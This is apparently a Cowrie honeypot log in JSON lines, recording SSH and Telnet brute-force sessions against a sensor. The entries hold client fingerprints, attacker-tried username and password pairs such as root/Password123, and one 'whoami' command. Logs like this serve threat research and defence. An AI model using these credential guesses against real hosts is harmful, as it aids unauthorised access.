{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:56:36.908390Z","src_ip":"212.227.235.229","session":"d46015bf2690"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44687,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b1594158987","protocol":"ssh","message":"New connection: 212.227.235.229:44687 (1.2.3.4:22) [session: 7b1594158987]","sensor":"my-vps","timestamp":"2025-08-26T18:56:37.157714Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:56:37.165586Z","src_ip":"212.227.235.229","session":"7b1594158987"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:56:37.413621Z","src_ip":"212.227.235.229","session":"7b1594158987"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T18:56:38.416595Z","src_ip":"212.227.235.229","session":"7b1594158987"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:56:39.678370Z","src_ip":"212.227.235.229","session":"7b1594158987"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45228,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fd67eb6a95d","protocol":"ssh","message":"New connection: 212.227.235.229:45228 (1.2.3.4:22) [session: 3fd67eb6a95d]","sensor":"my-vps","timestamp":"2025-08-26T18:56:39.925145Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:56:39.929650Z","src_ip":"212.227.235.229","session":"3fd67eb6a95d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:56:40.177001Z","src_ip":"212.227.235.229","session":"3fd67eb6a95d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:56:41.183340Z","src_ip":"212.227.235.229","session":"3fd67eb6a95d"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:56:41.432759Z","src_ip":"212.227.235.229","session":"d46015bf2690"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:56:41.436335Z","src_ip":"212.227.235.229","session":"3fd67eb6a95d"}
{"eventid":"cowrie.session.connect","src_ip":"219.102.131.35","src_port":49651,"dst_ip":"1.2.3.4","dst_port":23,"session":"9d5e48118179","protocol":"telnet","message":"New connection: 219.102.131.35:49651 (1.2.3.4:23) [session: 9d5e48118179]","sensor":"my-vps","timestamp":"2025-08-26T18:56:47.941248Z"}
{"eventid":"cowrie.session.closed","duration":31.504571676254272,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:57:19.445754Z","src_ip":"219.102.131.35","session":"9d5e48118179"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56665,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad033ada0d18","protocol":"ssh","message":"New connection: 212.227.235.229:56665 (1.2.3.4:22) [session: ad033ada0d18]","sensor":"my-vps","timestamp":"2025-08-26T18:57:40.671709Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:57:40.675507Z","src_ip":"212.227.235.229","session":"ad033ada0d18"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:57:40.931138Z","src_ip":"212.227.235.229","session":"ad033ada0d18"}
{"eventid":"cowrie.login.failed","username":"qbtuser","password":"123456","message":"login attempt [qbtuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T18:57:41.960559Z","src_ip":"212.227.235.229","session":"ad033ada0d18"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:57:43.218299Z","src_ip":"212.227.235.229","session":"ad033ada0d18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":61033,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f86d0d8f7d2","protocol":"ssh","message":"New connection: 212.227.125.160:61033 (1.2.3.4:22) [session: 3f86d0d8f7d2]","sensor":"my-vps","timestamp":"2025-08-26T18:57:46.297445Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:57:46.487469Z","src_ip":"212.227.125.160","session":"3f86d0d8f7d2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T18:57:46.488175Z","src_ip":"212.227.125.160","session":"3f86d0d8f7d2"}
{"eventid":"cowrie.login.success","username":"root","password":"Password123","message":"login attempt [root/Password123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:57:47.621552Z","src_ip":"212.227.125.160","session":"3f86d0d8f7d2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:57:48.293947Z","src_ip":"212.227.125.160","session":"3f86d0d8f7d2"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T18:57:48.294622Z","src_ip":"212.227.125.160","session":"3f86d0d8f7d2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:57:48.643994Z","src_ip":"212.227.125.160","session":"3f86d0d8f7d2"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:57:48.826401Z","src_ip":"212.227.125.160","session":"3f86d0d8f7d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37144,"dst_ip":"1.2.3.4","dst_port":22,"session":"31c03c6c2209","protocol":"ssh","message":"New connection: 212.227.235.229:37144 (1.2.3.4:22) [session: 31c03c6c2209]","sensor":"my-vps","timestamp":"2025-08-26T18:58:04.540941Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:58:04.542288Z","src_ip":"212.227.235.229","session":"31c03c6c2209"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:58:04.776748Z","src_ip":"212.227.235.229","session":"31c03c6c2209"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:58:05.195301Z","src_ip":"212.227.235.229","session":"31c03c6c2209"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39991,"dst_ip":"1.2.3.4","dst_port":22,"session":"89d776279a19","protocol":"ssh","message":"New connection: 212.227.235.229:39991 (1.2.3.4:22) [session: 89d776279a19]","sensor":"my-vps","timestamp":"2025-08-26T18:58:47.656316Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:58:47.657377Z","src_ip":"212.227.235.229","session":"89d776279a19"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41125,"dst_ip":"1.2.3.4","dst_port":22,"session":"0487d5a91870","protocol":"ssh","message":"New connection: 212.227.235.229:41125 (1.2.3.4:22) [session: 0487d5a91870]","sensor":"my-vps","timestamp":"2025-08-26T18:58:47.729480Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:58:47.730525Z","src_ip":"212.227.235.229","session":"0487d5a91870"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:58:47.987345Z","src_ip":"212.227.235.229","session":"0487d5a91870"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:58:48.083855Z","src_ip":"212.227.235.229","session":"89d776279a19"}
{"eventid":"cowrie.login.failed","username":"user","password":"p4ssw0rd","message":"login attempt [user/p4ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T18:58:49.052837Z","src_ip":"212.227.235.229","session":"0487d5a91870"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:58:50.314342Z","src_ip":"212.227.235.229","session":"0487d5a91870"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58172,"dst_ip":"1.2.3.4","dst_port":22,"session":"6197b244ad5c","protocol":"ssh","message":"New connection: 217.72.205.35:58172 (1.2.3.4:22) [session: 6197b244ad5c]","sensor":"my-vps","timestamp":"2025-08-26T18:58:57.248132Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:58:57.249395Z","src_ip":"217.72.205.35","session":"6197b244ad5c"}
{"eventid":"cowrie.session.closed","duration":"17.3","message":"Connection lost after 17.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:59:04.933770Z","src_ip":"212.227.235.229","session":"89d776279a19"}
{"eventid":"cowrie.session.connect","src_ip":"194.165.16.161","src_port":45024,"dst_ip":"1.2.3.4","dst_port":23,"session":"2abf12594792","protocol":"telnet","message":"New connection: 194.165.16.161:45024 (1.2.3.4:23) [session: 2abf12594792]","sensor":"my-vps","timestamp":"2025-08-26T18:59:32.298359Z"}
{"eventid":"cowrie.session.closed","duration":0.0012645721435546875,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:59:32.299554Z","src_ip":"194.165.16.161","session":"2abf12594792"}
{"eventid":"cowrie.session.connect","src_ip":"194.165.16.161","src_port":45131,"dst_ip":"1.2.3.4","dst_port":23,"session":"9f54075daa07","protocol":"telnet","message":"New connection: 194.165.16.161:45131 (1.2.3.4:23) [session: 9f54075daa07]","sensor":"my-vps","timestamp":"2025-08-26T18:59:32.311875Z"}
{"eventid":"cowrie.session.closed","duration":0.015408992767333984,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:59:32.327218Z","src_ip":"194.165.16.161","session":"9f54075daa07"}
{"eventid":"cowrie.session.connect","src_ip":"194.165.16.161","src_port":45357,"dst_ip":"1.2.3.4","dst_port":23,"session":"5aa9558ee09f","protocol":"telnet","message":"New connection: 194.165.16.161:45357 (1.2.3.4:23) [session: 5aa9558ee09f]","sensor":"my-vps","timestamp":"2025-08-26T18:59:32.341556Z"}
{"eventid":"cowrie.session.closed","duration":0.015462636947631836,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:59:32.356944Z","src_ip":"194.165.16.161","session":"5aa9558ee09f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53820,"dst_ip":"1.2.3.4","dst_port":22,"session":"8591eac32925","protocol":"ssh","message":"New connection: 212.227.235.229:53820 (1.2.3.4:22) [session: 8591eac32925]","sensor":"my-vps","timestamp":"2025-08-26T18:59:55.903953Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:59:55.908933Z","src_ip":"212.227.235.229","session":"8591eac32925"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:59:56.158526Z","src_ip":"212.227.235.229","session":"8591eac32925"}
{"eventid":"cowrie.login.failed","username":"pzuser","password":"password","message":"login attempt [pzuser/password] failed","sensor":"my-vps","timestamp":"2025-08-26T18:59:57.156360Z","src_ip":"212.227.235.229","session":"8591eac32925"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:59:58.409868Z","src_ip":"212.227.235.229","session":"8591eac32925"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53118,"dst_ip":"1.2.3.4","dst_port":22,"session":"93d76e1441b1","protocol":"ssh","message":"New connection: 212.227.235.229:53118 (1.2.3.4:22) [session: 93d76e1441b1]","sensor":"my-vps","timestamp":"2025-08-26T19:00:05.569721Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:00:05.570588Z","src_ip":"212.227.235.229","session":"93d76e1441b1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:00:05.805614Z","src_ip":"212.227.235.229","session":"93d76e1441b1"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"P@$$w0rd","message":"login attempt [ubuntu/P@$$w0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T19:00:06.785945Z","src_ip":"212.227.235.229","session":"93d76e1441b1"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:00:08.023508Z","src_ip":"212.227.235.229","session":"93d76e1441b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38280,"dst_ip":"1.2.3.4","dst_port":22,"session":"5467014c28f0","protocol":"ssh","message":"New connection: 212.227.235.229:38280 (1.2.3.4:22) [session: 5467014c28f0]","sensor":"my-vps","timestamp":"2025-08-26T19:01:01.533680Z"}
